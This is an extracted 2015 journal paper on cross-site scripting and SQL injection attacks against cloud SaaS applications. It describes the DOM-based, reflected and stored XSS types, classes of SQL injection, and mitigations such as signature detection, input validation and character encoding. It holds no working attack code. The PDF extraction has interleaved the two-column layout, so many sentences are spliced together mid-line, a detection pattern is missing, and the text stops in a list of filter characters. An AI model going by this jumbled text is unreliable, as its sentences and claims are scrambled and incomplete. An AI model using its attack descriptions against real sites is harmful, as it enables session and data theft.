Web Based XSS and SQL Attacks on Cloud and ...

Journal of Computer Science Engineering and Software Testing Volume 1 Issue 2

Web Based XSS and SQL Attacks on Cloud and Mitigation Neeta Sharma1, Mahtab Alam1, Mayank Singh2 1

Department of Computer Science Engineering, Noida International University, India 2

Department of Computer Science Engineering, Krishna Engineering College, India E-mail: [email protected], [email protected], [email protected]

Abstract A key technology towards enabling the use of Software as a Service (SaaS) in the cloud computing is Web 2.0 which relieves the users form tasks such as installation and maintenance.

Web based

applications are recently considered as the fastest service to provide on-line information. It has been used widely all around. As growing rate of using web based applications its vulnerabilities are also being discovered and disclosed at an alarming rate. Cloud computing systems are facing a web based software security problems. This type of attacks are use to exploit the authorization, authentication and accounting the vulnerability of Cloud Systems. Malicious programs can be uploaded to cloud systems to create damage. In other words, an attacker uses skills to exploit the system by injecting some malicious script into the web pages in a dynamic form that allows capturing the private session information. Cloud systems are susceptible to malware injection attacks and its security risks and threats were investigate based on the nature of the cloud service models. It is essential to identify the possible cloud attacks and threats for implement the better security mechanisms to protect cloud computing environment. In this paper we have present most common prominent web based malware injection with two category cross-site scripting and SQL injection attacks on the cloud and methods used to hack the website by different techniques and some mitigation technique to avoid such type of attacks. Keywords: Cross-site scripting, cloud computing, DOM based attack, SaaS, persistent attack, nonpersistent attack, web

1

Page 1-10 © MAT Journals 2015. All Rights Reserved

Journal of Computer Science Engineering and Software Testing Volume 1 Issue 2

INTRODUCTION

that generates web pages is fail to validate user

Web-based applications are generally provides

input and to ensure that the generated pages are

dynamic web pages for Internet users to access

properly encoded than it can be easily

applications (as an email or banking system)

exploited. An exploiter performs this task in a

via web browser. Cloud applications on SaaS

number of ways, such as by inserting a link in a

(Software as a Service) are also vulnerable to

message or in a spam message and it is also be

malware injection attacks. The web-servers are

executed by using e-mail spoofing that pretend

vulnerable to web based attacks, which includes

to be a trusted source.

injection flows, cross-site scripting, session management,

broken

authentication,

TYPE OF MALWARE INJECTION

information leakage, improper data validation,

ATTACKS

failure to blocked URL access, insecure

Tow most common malware injection attacks

communications

program

are SQL injection and Cross-site scripting

execution etc. Attackers inject a malicious

attacks in the web application vulnerability of

program into target cloud virtual machines and

the cloud computing.

applications on different models such as PaaS,

Cross-Site Scripting Attack

IaaS and SaaS [1]. Once attack launch

It is the kind of exploitation and a powerful

successfully, malicious code is execute as on

phishing attacks.

the valid instances running in the cloud then

hyperlink with malicious code is used to

attacker can do whatever he/she desires such as

gathered data. After data collection by the web

data theft, eavesdropping and manipulation of

application, malicious data is send to the user in

data. SQL Injection and XSS attacks are more

the form of output page and user think that it is

prominent in the web application of cloud

a valid content from the website [2]. Cross-site

computing systems. Cross-site scripting is a

scripting is the most common attack for

type of

security vulnerability

retrieval of information stored in user cookies,

commonly found in a web based application in

which can create the security confidential

which cross-site scripting information from one

problem. The attacker gains the ability to

context, where it is not trusted, can be inserted

capture the session information, such as users

into another context, where it is trusted, an

ID, passwords, credit card information and

attack can be launch. If web server application

others. With this type of attack, an attacker can

2

and

computer

malicious

In this attack, usually

Page 1-10 © MAT Journals 2015. All Rights Reserved

Journal of Computer Science Engineering and Software Testing Volume 1 Issue 2

change the user‟s setting and hijack the

the source, time, and types of signature. Cross-

account, theft cookie or false advertising. In

site

some situations, it might be possible that

malicious pages or with parameter values.

attacker can run arbitrary code on a victim‟s

Therefore, it is better for a system to detect

computer when XSS is combined with other

cross-site scripting to look scripting signature

flaws. Martin said that Cross-site scripting

either within parameter or within the requests

became the main software flaws that exploit the

that return exception handlers. To know the

software or application [3].

signatures in parameter values the system

scripting

attack

occurs

either

with

should correctly parse the URL and retrieve the Cross-site scripting attack is usually sidelined

value-part then start searching for signature

since it does not affect the organization but

from the value to overcome the encoding issues

rather its users. Attacker to bypass access

and for the signature in pages that return error

control such as the same origin policy uses an

messages the system need to know the specific

exploited cross-site scripting vulnerability.

URL, which returned an error code.

XSS attack can easily detect than the other

simple text pattern “” can be used to

attacks,

(Intrusion

detect cross-site scripting attacks. Protection

accomplish

against cross-site scripting attack, experts

detection. It is perceived as minimal threats by

suggests that web applications servers should

many security experts and developers [4]. The

include appropriate security mechanisms and

reason behind this perception is its easy

validate user input. Cross-site scripting attack

detection by signature. Cross-site scripting

mitigation

however,

Prevention

Systems)

many fail

IPS for

required

attacks can be detected accurately by knowing

3

Page 1-10 © MAT Journals 2015. All Rights Reserved

efforts

The

of

Journal of Computer Science Engineering and Software Testing Volume 1 Issue 2

Malicious Code

Normal Interaction

Browser Windows Email Client

Fetched Code

Browser Window

Fig. 1: Cross-Site Scripting Attack.

4

Page 1-10 © MAT Journals 2015. All Rights Reserved

Email Client

Journal of Computer Science Engineering and Software Testing Volume 1 Issue 2

server

administrators,

browser

using SaaS applications and it can be

manufacturers, application developers and

victimize by

better to keep in mind that web-application

SQL injection attack by botnet. There are

security practices should be continually

some following classes of SQL injection

growing process [5–7]. The above Figure 1

attack:

shows the process of cross-site scripting.

SQL Injection Attack



Inference or Blind SQL injection.



DBMS-specific.



Compounded SQL1.

SQL injection attack can take advantage of

o SQL injection + insufficient

security vulnerability in cloud software. This

authentication [10].

means the attackers can exploit vulnerable

o SQL

web-servers after injecting a malicious code

injection

+

DDoS

attacks [11].

for gain unauthorized access to the database.

o SQL

In this attack, hacker‟s main target is SQL

injection

+

DNS

hijacking [12].

servers that running vulnerable database

o SQL injection + XSS [13].

applications. Generally, this attack launched with help of botnet (used a thousand bots

CATEGORIES OF XSS (CROSS-SITE

that were equipped with an SQL injection

SCRIPTING) ATTACK

kit to fire an SQL injection attack) and if

Cross-site scripting attack is most common

attacker launches it successfully than he/she

and prominent web-application vulnerability

can

data,

and there are three standard vectors used for

manipulate the content of database and take

its execution. Use of any type of vector we

the control of the web-server also after

found the same result. Main motives behind

executing system commands [8, 9]. In the

XSS attack is to installation or execution of

Cloud Computing Environment, retailers

malicious

host their products and sell them online

applications. These are as follows:

Type-0 XSS Attack

this type problem exists within a client-

Type-0 or local XSS is known as DOM

side‟s page scripting itself. This category is

(Document Object Model) based attack. In

completely rely on JavaScript‟s that has

remotely

5

retrieve

sensitive

code

on

the

Page 1-10 © MAT Journals 2015. All Rights Reserved

web-based

Journal of Computer Science Engineering and Software Testing Volume 1 Issue 2

ability to run with privilege of the local zone

included in dynamic content. The injected

if the code is executed on the client machine

content is stored in an optimal place that is

such as an attacker can hijack the session by

displayed

sending some malicious code through an

particularly victims. The victims typically

email or via another mechanism, and use the

interact with sensitive data which is valuable

web page with the privileges of affected

to the attacker. When the user executes

user.

malicious content, an attacker may be able

to

either

many

users

or

to perform privileges operation(s) on the Type-1 XSS Attack

behalf of the user and gain access to

Type-1 or non-persistent XSS is known as

sensitive data of the user [6].

reflected XSS attack. In this category, an

Advanced XSS Attack

attacker sent perilous content to a vulnerable

Advanced XSS attack vectors are the

web-application, which executed by web-

combination

browser and reflected back to the user. The

(technique to exploit the web-site by

frequent method of this category of attack is

creating very similar site which imitate the

to include a malicious content in URL as a

original site in every aspects, often using a

parameter that sent directly e-mailed or

similar looking domain name) attacks,

posted publicly to a vulnerable site. As soon

which diminishes the chance of an average

as the site reflects the attacker‟s content to

user to recognize the attack. User is then

the user the content is executed and starts to

tricked into accessing the imitating site

transfer the private information to the

providing the logon credential, which the

attacker.

hacker can use to login to the real site. It

Type-2 XSS Attack

can be disguises the phishing activity and

Type-2 or stored XSS is known as Persistent

can perform using the following techniques:

cross-site scripting attack and referred as

Page Rewriting

second-order

scripting

Rewriting XSS page can take the advantages

vulnerability. This category is considering

of phishing concept without leaving the site

most powerful XSS attack. It occurs when

by using Java scripting which blank the

an exploiter inject malicious content into

targeted page and rewrites the code as a

database that is used later for read and

formal

6

cross-site

of

XSS

login

Page 1-10 © MAT Journals 2015. All Rights Reserved

and

phishing

page.

Journal of Computer Science Engineering and Software Testing Volume 1 Issue 2

The page looks like to be genuine even the

converting these characters to their HTML

users do not bother for this forge pages

equivalents [8].

however, the login points to the server machine.

(, ), [, ], >, ;, :,